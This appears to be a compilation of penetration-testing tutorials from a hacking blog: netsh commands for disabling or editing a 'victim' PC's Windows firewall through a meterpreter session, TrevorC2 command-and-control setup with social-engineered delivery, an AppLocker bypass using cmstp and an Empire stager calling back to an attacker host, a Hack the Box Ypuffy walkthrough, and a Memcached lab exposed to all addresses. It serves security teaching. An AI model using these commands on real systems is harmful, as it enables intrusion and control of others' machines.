Firewall Penetration Testing in Remote Windows PC (netsh Tutorial)

Firewall is a network security system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in varied modes i.e. hardware, software, or a combination of both. There are many types of firewall such as Proxy firewall, Application Firewall, Stateful firewall, Packet firewall, etc.

Firewalls are connected to the network and are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets ensuring security. All messages entering into or leaving the intranet pass through a firewall, which examines each message and block those which do not meet the specified security criteria.

 Firewall is functional on two rules which are always encircled by Inbound and outbound rules:

Inbound rules: These are the ones which filter traffic passing from the network to the local computer based on the filtering conditions specified in the rule.

Outbound rules: These are the ones which filter traffic passing from the local computer to the network based on the filtering conditions specified in the rule.

Both inbound and outbound rules can be configured to allow or block traffic as needed.

In other words, we can say that Inbound rules are to do with other things accessing your computer. If you are running a Web Server on your computer then you will have to tell the Firewall that outsiders are allowed to connect to it. Further Outbound rules categorize some programs to use the Internet yet block others. You will want to let your Web Browser (Internet Explorer, Firefox, Safari, Chrome, Opera...) have accessibility to the Internet, so a command can be inserted which displays that Windows Firewall is allowed.

Now let us assume that the firewall of the victim's PC is enabled:

So to turn off the firewall of victim's PC, first of all, get a session through meterpreter and then take the administrator privileges of the remote PC. Move on to the shell of remote PC and write

netsh firewall set opmode mode=disable to turn off the firewall of remote PC.

And like this, the firewall of remote PC will be disabled.

How to Block Website in Remote PC:

We can not only turn off or on the firewall through Metasploit but we can also block and allow access to any particular port. Yes, that means we can control Inbound and Outbound rules as well. Again after having the session through meterpreter and bypassing administrative privileges and going to the shell of the remote PC just type

netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80 action=block

Here,

Name = The name of the rule. (Pick something descriptive)

Protocol = The protocol we are going to block (UDP or TCP for most cases)

Dir = The direction of the block. Can be IN or OUT

Remote Port = The port of the remote host that is going to be blocked

Action = Could be block or allow. In our case we want to block the connection

Once you execute the above code, all outbound requests to any host on port 80 will be blocked, and it adds an entry to the Windows firewall:

And if you check its properties and click on 'Protocols and Ports' tab then you can see the result.

How to Block Multiple Ports

Now that we have how to block a port in remote PC, let us dig a little deeper i.e we can not only block one port but also two or more than two. And to block two to more port again take a meterpreter session as well as administrator privileges of the remote PC and just write

netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80,443 action=block

Once you execute the above code, all outbound requests to any host on port 80 will be blocked, and it adds an entry to the Windows firewall:

And if you check its properties and click on 'Protocols and Ports' tab then you will find that now it has blocked both port 80 and port 443:

Now, by blocking ports 80 and 443 we have blocked the HTTP and HTTPS services on the remote PC and so our victim will not be able to access any website. And the following error is displayed :

How to view Firewall Rules

Now we will learn how to view inbound and outbound rules of the firewall in remote PC, how to delete a rule, how to allow the port on which our payload will work in future, how to stop your remote PC from being ping.

First of all let us assume that there is a blocked port in an outbound rule in our remote PC:

To know which rule is enabled and disabled in our remote PC, take a session through meterepreter and bypass administrator privileges. After doing so type:

 netsh advfirewall firewall show rule=all

Once this command is executed, all the rules will be displayed :

In the above image, we can see that Port 80 and Port 443 is blocked under the rule name “Block All Ports”.  So to delete that rule in the remote PC  type :

Netsh  advfirewall firewall delete rule name=”Block All Ports” 

Once this command executed, the said rule will be deleted. And you can run
netsh advfirewall firewall show rule=all
Command again to see the result :

And we can also see the result in the firewall outbound rules :

Our normal payload works on port 4444. Now, if we want to allow port 4444 so we can upload a payload which works on port 4444, we just have to type :

netsh advfireweall firewall add rule name=”Allow Port 4444” protocol=TCP dir=out remoteport=4444 action=allow

Once this command executed, port 4444 will be allowed on our remote PC :

Now to block stop our remote PC from being pinged we can just type :
netsh advfirewall firewall add rule name=”All ICMPV4” dir=in action=block protocol=icmpv4

When this command will be executed, a rule blocking ping to our remote PC will be created:

And the following will be the result :

View Current Profile Status

Now we will see how to block /allow particular IP Address in remote PC Firewall and also learn how to view details of programs added to the exception/allowed list and the details of port added to the exception/allowed list. Along with this, we will learn how to see the status of the main settings of Firewall and what its current profile, i.e is whether it is on or off.

netsh advfirewall show currentprofiles

After knowing the profile of the firewall we can see which programs are allowed by the host of Remote PC. For this, type:

netsh firewall show allowedprogram

Our next command is to see the status of the main settings. And to see them, type:
netsh firewall show config

Next, we can also see the location of the file in which all the firewall logs are kept. And for this, type:
netsh firewall show logging

The firewall also allows us to Block a single IP address while allowing others and vice versa. So first to let us learn how we can Block a single IP For this, type:

netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=192.168.0.15/32

(In the above command "/32" is a subnet mask of IP.)

After executing the said command, we can see the following result:

And we now see the properties of the IP Block rule we can see that the IP: 192.168.0.15 is blocked

Now, similarly, to allow a particular IP Address, type:
netsh advfirewall firewall add rule name="Allow IP" dir=in interface=any action=allow remoteip=192.168.0.15/32
(In the above command "/32" is a subnet mask of IP)

After executing the said command, you can see the following result:

And we now see the properties of the IP Block rule we can see that the IP: 192.168.0.15 is Allowed :

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

TrevorC2 - Command and Control

TrevorC2 is command and control framework. It is client/server model which works through a browser masquerading as C2 tool. It works on different time intervals which makes it almost impossible to be detected. This tool is coded in python but it’s also compatible with c#, PowerShell, or any other platform. this is supported by both windows and MacOS along with Linux. It is very easy and convenient to use.

You can download it from: https://github.com/trustedsec/trevorc2

Once its downloaded, open the folder and then open trevorc2_server.py file and change the IP to your local host IP as shown in the image below. Also, provide the site that will be cloned to the trevorc2 server.

Then, start and run trevorc2 framework.

Once the trevorc2 is up and running, change the IP to your local host IP in trevorcs.ps1 file.

Then send this file to the victim using any desired social engineering method. Once the file is executed by the victim, you will have your session as shown in the image below :

To see the sessions type :

list

And to access this session type :

interact

Bypass Application Whitelisting using cmstp

By default, Applocker allows the executing of binaries in the folder that is the major reason that it can be bypassed. It has been found that such binaries can easily be used in order to bypass Applocker along with UAC. One of such binary related to Microsoft is CMSTP. CMSTP welcomes INF files and so exploitation through INF is possible. And so, we will be learning how to perform such exploitation.

As we all know CMSTP accepts SCT files and runs then without suspicion and therefore we will create a malicious SCT file to reach our goal.  We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell click here.

Launch the empire framework from the terminal of Kali and then type the following commands to create your malware :

listeners

uselistener http

set Host 192.168.1.109

execute

Above commands will create a listener for you, then type back to return from listener interface and as for the creation of SCT file type :

usestager windows/launcher_sct

set Listener HTTP

execute

Running the above exploit will create your SCT file. We will use the following script to execute our file in PowerShell. In this script give the path of your SCT file and add the following line as shown in the image.

Download this script from here:

Now, send the file to the victim’s PC and run the following command in victims’ command prompt :

cmstp.exe /s shell.inf

As soon as you run the command, you will have a session. Use the following command to access your session :

interact

This way, you can use CMSTP binary to bypass applocker restrictions. CMSTP needs an INF file and by using it to your advantage you can have access to victim’s PC.

Hack the Box: Ypuffy Walkthrough

Today we are going to solve another CTF challenge “Ypuffy”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Ypuffy is 10.10.10.107

Penetrating Methodology

·        Network scanning (Nmap)
·        Scanning port 389 using LDAP script
·        Fetching shared directory using smbclient and finding private key
·        Connecting to VM with SSH using private key
·        Enumerating files with SUID bit set
·        Discovering that alice1978 can run ssh-keygen as userca
·        Discovering authorized commands at ssh login
·        Fetching principal using curl command
·        Enumerating public certificate in system
·        Signing RSA key with ca certificate using doas command and previously found principal
·        Logging into ssh using new private key pair
·        Snagging the flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sV -sC 10.10.10.107

The nmap scan shows us that there are 5 ports open: 22(SSH), 80(HTTP), 139(SMB), 389(LDAP), 445(SMB)

As LDAP service is running on port 389, we use nmap script called “ldap-search” to enumerate the target machine and we find the password hash for user “alice1978”.

nmap -389 --script=ldap-search 10.10.10.107

Now as we find the password hash and username, we can login through using SMB using smbclient.

First we check the shared directory available on the target machine and find a directory called “alice”. We then access the shared directory and find a file called “my_private_key.ppk”, we download the file to our local system.

smbclient –L \\\\10.10.10.107\\ -U alice1978%<hash> --pw-nt-hash

smbclient \\\\10.10.10.107\\alice -U alice1978% --pw-nt-hash

The file we downloaded was a “Putty Private Key” file, so we use puttygen to convert the file into RSA private key. After converting it into RSA key, we change the permission of the rsa key and use it to login through SSH.

puttygen my_private_key.ppk -O private-openssh -o id_rsa

chmod 600 id_rsa

ssh -i id_rsa alice1978@10.10.10.107

After logging in through SSH, we find a file called “user.txt”. We take a look at the contents of the file and find the first flag.

Now we check the files with suid bit enabled and find that “doas” is available on the target machine. It is a command utility similar to “sudo” command. Now we check “/etc/doas.conf” to find what commands we can run. We find that we can run “/usr/bin/ssh-keygen” as user “userca”.

find / -perm -4000 2>/dev/null

cat /etc/doas.conf

To further enumerate the target machine, we use open the ssh configuration file at “/etc/ssh/sshd_config” and find we can run the command “/usr/bin/curl http://127.0.0.1/sshauth?type=key&username=%u” and “/usr/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u”.  

Further enumerating the web application, we find that we can request keys from “http://127.0.0.1/sshauth?type=key&username=%u” and principals from “http://127.0.0.1/sshauth?type=principals&username=%u”, we requested keys for root user and get no response but we are successfully able to get root user’s principal.

curl “http://127.0.0.1/sshauth?type=key&username=root”

curl “http://127.0.0.1/sshauth?type=principals&username=root”

As we have the root user’s principal, we can generate SSH keys and sign them with root’s principal. Doing so will allow us to login through SSH as root. Now we know we can run ssh-keygen to generate SSH keys but first we need certificate to sign the SSH key. We enumerate the machine to find a certificate and find one inside /home/userca directory.

First we generate SSH keys and move them into the /tmp directory. Then we sign the keys as userca to read the certificate inside /home/userca/ca.

ssh-keygen

mv .ssh/id_rsa* /tmp/

doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgency84ckd00r -I root /tmp/id_rsa.pub

After signing the RSA keys, we use the RSA key to login through SSH as root user. After logging in we find a file called “root.txt”. We take a look inside the content of the file and find the final flag.

ssh -i /tmp/id_rsa root@localhost

Pentest Lab Setup on Memcached

In this article, we are going to learn about pen-testing in Memcached lab setup in Ubuntu 18.04. Memcached server is used by corporations in order to increase the speed of their network as it helps to store frequently used data. This helps to take offload of the hardware and decrease the time taken.

Table of contents

·        Introduction to Memcached.

·        Memcached installation.

·        Memcached configuration.

Introduction to Memcached

Memcached is a distributed memory object caching system. It's an open source and without any cost tool. It is used to speed up web applications by using a database from the cache memory. It is an in-memory key-value store for little bits of self-assertive information (strings, objects) that is extracted from database calls, API calls, or page rendering. Memcached is basic however capable of advancing speed arrangement, ease of advancement, and understands numerous issues confronting expansive information caches. Its API is accessible for most prevalent languages.

Memcached installation                                                                             

To install, boot up your Ubuntu machine and open the terminal.

Note: Apache2 should be installed before installing Memcached. You can easily install Apache2 by just typing in a simple command.

apt install apache2

Now that we are all done, let’s setup Memcached by typing the commands shown below.

apt install memcached

After installing Memcached add ppa:ondrej/php PPA in your Ubuntu system’s repository to download

and install the latest version of PHP available. Follow the commands as shown below.

add-apt-repository ppa:ondrej/php

After adding the repository, update the system by typing in the following command.

apt update

Now, install PHP by executing the command shown below :

apt install –y php php-dev php-pear libapache2-mod-php

Now that PHP has been installed successfully in our system, we will go ahead and install the PHP Memcached module by executing the below command:

apt install -y php-memcached

Once the installation is complete, restart the Apache2 service.

service apache2 restart

Now check whether the PHP extension is working fine or not by creating a info.php by using the code mentioned below with nano or any text editor you like.

  phpinfo();

?>

Now save the file in /var/www/html

Once the file is saved, access it from your web browser by typing in the following URL.

localhost/info.php

You should see the results as shown in the image below.

Memcached Configuration

Now, here we are going to configure the Memcached Server. To do so, we have to edit its configuration file. You will find this configuration file through /etc/memcached.conf path. Open the memcached.conf file using nano or any other text editor. The commands that are shown below will be given and activated by default. The purpose of this mentioning is to let you know that where you can find it; along with why and how to make changes to it., if necessary. Following are the said commands which are important for low-level Memcached Server configuration:

-m 64

Here,

-m: specifies the maximum memory limit which is used by Memcached daemon. By default, this limit is 64 MB

-p 11211

Here,

-p: specifies the port number. By default, it’s 11211.

-u memcache

Here,

-u: starts the daemon tool as root.

After this, uncomment “-l 127.0.0.1” by simply adding # as shown in the image, as it will not be so by default. By uncommenting, it will stop binding the IP address of Memcached listener to the loopback IP. Hence, traffic can come from any IP over the internet.

Now once you saved the configuration file after making the changes, restart the service by using the following command :

service memcached restart

Then use the following command to confirm whether Memcached configurations are working are not :

ss -tnl

Once you are done with the above commands, connect Memcached through telnet and do a version check by typing in “version” command:

telnet localhost 11211

version

Now, you can use nmap to check if the Memcached service is running on the server.

nmap -sV -p- 192.168.1.32

Conclusion

To conclude, we can say that Memcached is a basic caching system. It uses expiration timeouts i.e. if the server has no memory left, it will evict items to replace them with the new ones. The items it chooses to replace are the ones which have been not requested for a long period of time. And so, in the above article, we have provided a basic guide to setup the Memcached penetration testing lab.